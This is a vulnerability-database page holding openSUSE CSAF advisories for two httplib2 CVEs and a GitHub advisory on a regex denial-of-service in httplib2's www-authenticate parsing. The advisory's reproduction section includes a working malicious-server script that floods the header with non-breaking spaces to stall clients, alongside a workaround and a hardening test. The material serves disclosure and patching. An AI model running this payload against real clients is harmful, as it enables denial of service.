Tumbleweed:python312-httplib2-0.22.0-4.5.ppc64le", "openSUSE 
Tumbleweed:python312-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.x86_64", ], }, ], scores: [ { cvss_v3: { baseScore: 6.5, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.x86_64", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.x86_64", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.x86_64", ], }, ], threats: [ { category: "impact", date: "2024-07-12T00:00:00Z", details: "moderate", }, ], title: "CVE-2021-21240", }, ], }
opensuse-su-2024:11231-1
Vulnerability from csaf_opensuse
Notes
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "python36-httplib2-0.19.1-1.2 on GA media", title: "Title of the patch", }, { category: "description", text: "These are all security issues fixed in the python36-httplib2-0.19.1-1.2 package on the GA media of openSUSE Tumbleweed.", title: "Description of the patch", }, { category: "details", text: "openSUSE-Tumbleweed-2024-11231", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_11231-1.json", }, { category: "self", summary: "SUSE CVE CVE-2020-11078 page", url: "https://www.suse.com/security/cve/CVE-2020-11078/", }, { category: "self", summary: "SUSE CVE CVE-2021-21240 page", url: "https://www.suse.com/security/cve/CVE-2021-21240/", }, ], title: "python36-httplib2-0.19.1-1.2 on GA media", tracking: { current_release_date: "2024-06-15T00:00:00Z", generator: { date: "2024-06-15T00:00:00Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "openSUSE-SU-2024:11231-1", initial_release_date: "2024-06-15T00:00:00Z", revision_history: [ { date: "2024-06-15T00:00:00Z", number: "1", summary: "Current version", }, ], status: "final", 
version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "python36-httplib2-0.19.1-1.2.aarch64", product: { name: "python36-httplib2-0.19.1-1.2.aarch64", product_id: "python36-httplib2-0.19.1-1.2.aarch64", }, }, { category: "product_version", name: "python38-httplib2-0.19.1-1.2.aarch64", product: { name: "python38-httplib2-0.19.1-1.2.aarch64", product_id: "python38-httplib2-0.19.1-1.2.aarch64", }, }, { category: "product_version", name: "python39-httplib2-0.19.1-1.2.aarch64", product: { name: "python39-httplib2-0.19.1-1.2.aarch64", product_id: "python39-httplib2-0.19.1-1.2.aarch64", }, }, ], category: "architecture", name: "aarch64", }, { branches: [ { category: "product_version", name: "python36-httplib2-0.19.1-1.2.ppc64le", product: { name: "python36-httplib2-0.19.1-1.2.ppc64le", product_id: "python36-httplib2-0.19.1-1.2.ppc64le", }, }, { category: "product_version", name: "python38-httplib2-0.19.1-1.2.ppc64le", product: { name: "python38-httplib2-0.19.1-1.2.ppc64le", product_id: "python38-httplib2-0.19.1-1.2.ppc64le", }, }, { category: "product_version", name: "python39-httplib2-0.19.1-1.2.ppc64le", product: { name: "python39-httplib2-0.19.1-1.2.ppc64le", product_id: "python39-httplib2-0.19.1-1.2.ppc64le", }, }, ], category: "architecture", name: "ppc64le", }, { branches: [ { category: "product_version", name: "python36-httplib2-0.19.1-1.2.s390x", product: { name: "python36-httplib2-0.19.1-1.2.s390x", product_id: "python36-httplib2-0.19.1-1.2.s390x", }, }, { category: "product_version", name: "python38-httplib2-0.19.1-1.2.s390x", product: { name: "python38-httplib2-0.19.1-1.2.s390x", product_id: "python38-httplib2-0.19.1-1.2.s390x", }, }, { category: "product_version", name: "python39-httplib2-0.19.1-1.2.s390x", product: { name: "python39-httplib2-0.19.1-1.2.s390x", product_id: "python39-httplib2-0.19.1-1.2.s390x", }, }, ], category: "architecture", name: "s390x", }, { branches: [ { category: 
"product_version", name: "python36-httplib2-0.19.1-1.2.x86_64", product: { name: "python36-httplib2-0.19.1-1.2.x86_64", product_id: "python36-httplib2-0.19.1-1.2.x86_64", }, }, { category: "product_version", name: "python38-httplib2-0.19.1-1.2.x86_64", product: { name: "python38-httplib2-0.19.1-1.2.x86_64", product_id: "python38-httplib2-0.19.1-1.2.x86_64", }, }, { category: "product_version", name: "python39-httplib2-0.19.1-1.2.x86_64", product: { name: "python39-httplib2-0.19.1-1.2.x86_64", product_id: "python39-httplib2-0.19.1-1.2.x86_64", }, }, ], category: "architecture", name: "x86_64", }, { branches: [ { category: "product_name", name: "openSUSE Tumbleweed", product: { name: "openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed", product_identification_helper: { cpe: "cpe:/o:opensuse:tumbleweed", }, }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python36-httplib2-0.19.1-1.2.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.aarch64", }, product_reference: "python36-httplib2-0.19.1-1.2.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python36-httplib2-0.19.1-1.2.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.ppc64le", }, product_reference: "python36-httplib2-0.19.1-1.2.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python36-httplib2-0.19.1-1.2.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.s390x", }, product_reference: "python36-httplib2-0.19.1-1.2.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: 
"python36-httplib2-0.19.1-1.2.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.x86_64", }, product_reference: "python36-httplib2-0.19.1-1.2.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python38-httplib2-0.19.1-1.2.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.aarch64", }, product_reference: "python38-httplib2-0.19.1-1.2.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python38-httplib2-0.19.1-1.2.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.ppc64le", }, product_reference: "python38-httplib2-0.19.1-1.2.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python38-httplib2-0.19.1-1.2.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.s390x", }, product_reference: "python38-httplib2-0.19.1-1.2.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python38-httplib2-0.19.1-1.2.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.x86_64", }, product_reference: "python38-httplib2-0.19.1-1.2.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python39-httplib2-0.19.1-1.2.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.aarch64", }, product_reference: "python39-httplib2-0.19.1-1.2.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python39-httplib2-0.19.1-1.2.ppc64le 
as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.ppc64le", }, product_reference: "python39-httplib2-0.19.1-1.2.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python39-httplib2-0.19.1-1.2.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.s390x", }, product_reference: "python39-httplib2-0.19.1-1.2.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python39-httplib2-0.19.1-1.2.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.x86_64", }, product_reference: "python39-httplib2-0.19.1-1.2.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, ], }, vulnerabilities: [ { cve: "CVE-2020-11078", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2020-11078", }, ], notes: [ { category: "general", text: "In httplib2 before version 0.18.0, an attacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping. 
This has been fixed in 0.18.0.", title: "CVE description", }, ], product_status: { recommended: [ "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.x86_64", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.x86_64", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.x86_64", ], }, references: [ { category: "external", summary: "CVE-2020-11078", url: "https://www.suse.com/security/cve/CVE-2020-11078", }, { category: "external", summary: "SUSE Bug 1171998 for CVE-2020-11078", url: "https://bugzilla.suse.com/1171998", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.x86_64", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.x86_64", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.x86_64", ], }, ], scores: [ { cvss_v3: 
{ baseScore: 6.8, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", version: "3.1", }, products: [ "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.x86_64", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.x86_64", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.x86_64", ], }, ], threats: [ { category: "impact", date: "2024-06-15T00:00:00Z", details: "moderate", }, ], title: "CVE-2020-11078", }, { cve: "CVE-2021-21240", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2021-21240", }, ], notes: [ { category: "general", text: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. 
This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", title: "CVE description", }, ], product_status: { recommended: [ "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.x86_64", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.x86_64", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.x86_64", ], }, references: [ { category: "external", summary: "CVE-2021-21240", url: "https://www.suse.com/security/cve/CVE-2021-21240", }, { category: "external", summary: "SUSE Bug 1182053 for CVE-2021-21240", url: "https://bugzilla.suse.com/1182053", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.x86_64", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.x86_64", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.ppc64le", "openSUSE 
Tumbleweed:python39-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.x86_64", ], }, ], scores: [ { cvss_v3: { baseScore: 6.5, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.x86_64", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.x86_64", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.x86_64", ], }, ], threats: [ { category: "impact", date: "2024-06-15T00:00:00Z", details: "moderate", }, ], title: "CVE-2021-21240", }, ], }
opensuse-su-2021:1806-1
Vulnerability from csaf_opensuse
Notes
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Security update for python-httplib2", title: "Title of the patch", }, { category: "description", text: "This update for python-httplib2 fixes the following issues:\n\n- Update to version 0.19.0 (bsc#1182053).\n- CVE-2021-21240: Fixed regular expression denial of service via malicious header (bsc#1182053).\n- CVE-2020-11078: Fixed unescaped part of uri where an attacker could change request headers and body (bsc#1182053).\n", title: "Description of the patch", }, { category: "details", text: "openSUSE-SLE-15.3-2021-1806", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2021_1806-1.json", }, { category: "self", summary: "URL for openSUSE-SU-2021:1806-1", url: "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/DTGWJY2VML3YAAFAOOYJAQP5SZ4X6XWG/", }, { category: "self", summary: "E-Mail link for openSUSE-SU-2021:1806-1", url: "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/DTGWJY2VML3YAAFAOOYJAQP5SZ4X6XWG/", }, { category: "self", summary: "SUSE Bug 1171998", url: 
"https://bugzilla.suse.com/1171998", }, { category: "self", summary: "SUSE Bug 1182053", url: "https://bugzilla.suse.com/1182053", }, { category: "self", summary: "SUSE CVE CVE-2020-11078 page", url: "https://www.suse.com/security/cve/CVE-2020-11078/", }, { category: "self", summary: "SUSE CVE CVE-2021-21240 page", url: "https://www.suse.com/security/cve/CVE-2021-21240/", }, ], title: "Security update for python-httplib2", tracking: { current_release_date: "2021-07-11T12:03:47Z", generator: { date: "2021-07-11T12:03:47Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "openSUSE-SU-2021:1806-1", initial_release_date: "2021-07-11T12:03:47Z", revision_history: [ { date: "2021-07-11T12:03:47Z", number: "1", summary: "Current version", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "python2-httplib2-0.19.0-3.3.1.noarch", product: { name: "python2-httplib2-0.19.0-3.3.1.noarch", product_id: "python2-httplib2-0.19.0-3.3.1.noarch", }, }, { category: "product_version", name: "python3-httplib2-0.19.0-3.3.1.noarch", product: { name: "python3-httplib2-0.19.0-3.3.1.noarch", product_id: "python3-httplib2-0.19.0-3.3.1.noarch", }, }, ], category: "architecture", name: "noarch", }, { branches: [ { category: "product_name", name: "openSUSE Leap 15.3", product: { name: "openSUSE Leap 15.3", product_id: "openSUSE Leap 15.3", product_identification_helper: { cpe: "cpe:/o:opensuse:leap:15.3", }, }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python2-httplib2-0.19.0-3.3.1.noarch as component of openSUSE Leap 15.3", product_id: "openSUSE Leap 15.3:python2-httplib2-0.19.0-3.3.1.noarch", }, product_reference: "python2-httplib2-0.19.0-3.3.1.noarch", relates_to_product_reference: "openSUSE Leap 15.3", }, { category: 
"default_component_of", full_product_name: { name: "python3-httplib2-0.19.0-3.3.1.noarch as component of openSUSE Leap 15.3", product_id: "openSUSE Leap 15.3:python3-httplib2-0.19.0-3.3.1.noarch", }, product_reference: "python3-httplib2-0.19.0-3.3.1.noarch", relates_to_product_reference: "openSUSE Leap 15.3", }, ], }, vulnerabilities: [ { cve: "CVE-2020-11078", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2020-11078", }, ], notes: [ { category: "general", text: "In httplib2 before version 0.18.0, an attacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping. This has been fixed in 0.18.0.", title: "CVE description", }, ], product_status: { recommended: [ "openSUSE Leap 15.3:python2-httplib2-0.19.0-3.3.1.noarch", "openSUSE Leap 15.3:python3-httplib2-0.19.0-3.3.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2020-11078", url: "https://www.suse.com/security/cve/CVE-2020-11078", }, { category: "external", summary: "SUSE Bug 1171998 for CVE-2020-11078", url: "https://bugzilla.suse.com/1171998", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "openSUSE Leap 15.3:python2-httplib2-0.19.0-3.3.1.noarch", "openSUSE Leap 15.3:python3-httplib2-0.19.0-3.3.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.8, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", version: "3.1", }, products: [ "openSUSE Leap 15.3:python2-httplib2-0.19.0-3.3.1.noarch", "openSUSE Leap 15.3:python3-httplib2-0.19.0-3.3.1.noarch", ], }, ], threats: [ { category: "impact", date: "2021-07-11T12:03:47Z", 
details: "moderate", }, ], title: "CVE-2020-11078", }, { cve: "CVE-2021-21240", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2021-21240", }, ], notes: [ { category: "general", text: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", title: "CVE description", }, ], product_status: { recommended: [ "openSUSE Leap 15.3:python2-httplib2-0.19.0-3.3.1.noarch", "openSUSE Leap 15.3:python3-httplib2-0.19.0-3.3.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2021-21240", url: "https://www.suse.com/security/cve/CVE-2021-21240", }, { category: "external", summary: "SUSE Bug 1182053 for CVE-2021-21240", url: "https://bugzilla.suse.com/1182053", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "openSUSE Leap 15.3:python2-httplib2-0.19.0-3.3.1.noarch", "openSUSE Leap 15.3:python3-httplib2-0.19.0-3.3.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.5, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "openSUSE Leap 15.3:python2-httplib2-0.19.0-3.3.1.noarch", "openSUSE Leap 15.3:python3-httplib2-0.19.0-3.3.1.noarch", ], }, ], threats: [ { category: "impact", date: "2021-07-11T12:03:47Z", details: "moderate", }, ], title: "CVE-2021-21240", }, ], }
ghsa-93xj-8mrv-444m
Vulnerability from github
Impact
A malicious server which responds with a long series of `\xa0` characters in the `www-authenticate` header may cause Denial of Service (CPU burn while parsing the header) of the httplib2 client accessing said server.
Patches
Version 0.19.0 contains a new implementation of auth header parsing using the pyparsing library: https://github.com/httplib2/httplib2/pull/182
Workarounds
```py
import httplib2
httplib2.USE_WWW_AUTH_STRICT_PARSING = True
```
Technical Details
The vulnerable regular expression is https://github.com/httplib2/httplib2/blob/595e248d0958c00e83cb28f136a2a54772772b50/python3/httplib2/__init__.py#L336-L338
The section before the equals sign contains multiple overlapping groups. Ignoring the optional part containing a comma, we have:

```
\s*[^ \t\r\n=]+\s*=
```
Since all three infinitely repeating groups accept the non-breaking space character `\xa0`, a long string of `\xa0` causes catastrophic backtracking.

The complexity is cubic, so doubling the length of the malicious string of `\xa0` makes processing take 8 times as long.
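The following script is an added example (not part of the advisory or of httplib2's code): it checks the class overlap the advisory describes, contrasts the simplified vulnerable prefix with a rewrite whose token class is the exact complement of `\s`, and confirms the rewrite still extracts parameter names from well-formed input. It assumes the scheme token and its trailing space have already been split off the header value; the timing helper is illustrative and its numbers depend on the machine.

```python
"""Why the httplib2 auth-header regex backtracks on U+00A0, and a rewrite
that does not. Added example; constructed inputs, not httplib2's own code."""
import re
import time

# Simplified prefix of the pattern quoted in the advisory (the optional comma
# group dropped, as the advisory does). Anchored: the parser matches from the
# start of the remaining header text.
VULNERABLE = re.compile(r"^\s*([^ \t\r\n=]+)\s*=")

# Hardened rewrite: the token class is the exact complement of \s, so a run of
# whitespace can be divided between the repeats in only one way and a failed
# match is abandoned after a linear scan instead of O(n^3) re-splits.
HARDENED = re.compile(r"^\s*([^\s=]+)\s*=")

NBSP = "\xa0"


def overlapping_classes(ch: str) -> bool:
    """True when both the whitespace class and the vulnerable token class
    accept ch, i.e. when the three repeats compete for the same input.
    In Python str patterns \\s covers all Unicode whitespace, so U+00A0
    qualifies while a plain space does not (the token class excludes it)."""
    return bool(re.fullmatch(r"\s", ch)) and bool(re.fullmatch(r"[^ \t\r\n=]", ch))


def hostile_rest(n: int) -> str:
    """Constructed input modelled on the advisory's header value: what follows
    the scheme token, n non-breaking spaces and a trailing 'x' with no '='.
    Assumption: the scheme and the space after it were already split off."""
    return NBSP * n + "x"


def parse_param(pattern: re.Pattern, text: str):
    """Parameter name the pattern extracts from an auth parameter such as
    'realm="example"', or None when the text does not start with one."""
    m = pattern.match(text)
    return m.group(1) if m else None


def time_match(pattern: re.Pattern, text: str) -> float:
    """Seconds spent in one match attempt (which fails on hostile_rest)."""
    start = time.perf_counter()
    pattern.match(text)
    return time.perf_counter() - start


def growth_ratio(pattern: re.Pattern, n: int) -> float:
    """Slowdown when the hostile input doubles: cubic backtracking gives
    roughly 8x, a linear scan stays close to 2x or below."""
    t1 = time_match(pattern, hostile_rest(n))
    t2 = time_match(pattern, hostile_rest(2 * n))
    return t2 / t1 if t1 > 0 else float("inf")


if __name__ == "__main__":
    print("U+00A0 accepted by both classes:", overlapping_classes(NBSP))
    print("space accepted by both classes: ", overlapping_classes(" "))
    for n in (50, 100, 200):
        print(f"n={n:3d} vulnerable={time_match(VULNERABLE, hostile_rest(n)):.4f}s"
              f" hardened={time_match(HARDENED, hostile_rest(n)):.6f}s")
    print("vulnerable doubling ratio ~", round(growth_ratio(VULNERABLE, 100), 1))
    print("hardened doubling ratio   ~", round(growth_ratio(HARDENED, 100), 1))
```

The hardened class also stops tokens from containing form feed or vertical tab, which RFC 7230 token characters never include anyway.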
Reproduction Steps
Run a malicious server which responds with

```
www-authenticate: x \xa0\xa0\xa0\xa0x
```

but with many more `\xa0` characters.
An example malicious python server is below:
```py
from http.server import BaseHTTPRequestHandler, HTTPServer


def make_header_value(n_spaces):
    repeat = "\xa0" * n_spaces
    return f"x {repeat}x"


class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.log_request(401)
        self.send_response_only(401)  # Don't bother sending Server and Date
        n_spaces = (
            int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
            if len(self.path) > 1
            else 65512  # Max header line length 65536
        )
        value = make_header_value(n_spaces)
        self.send_header("www-authenticate", value)  # This header can actually be sent multiple times
        self.end_headers()


if __name__ == "__main__":
    HTTPServer(("", 1337), Handler).serve_forever()
```
Connect to the server with httplib2:
```py
import httplib2
httplib2.Http(".cache").request("http://localhost:1337", "GET")
```
To benchmark performance with shorter strings, you can set the path to a number e.g. http://localhost:1337/1000
References
Thanks to [Ben Caller](https://github.com/b-c-ds) ([Doyensec](https://doyensec.com)) for finding the vulnerability and for the discreet notification.
For more information
If you have any questions or comments about this advisory:
- Open an issue in [httplib2](https://github.com/httplib2/httplib2/issues/new)
- Email the current maintainer (as of 2021-01)
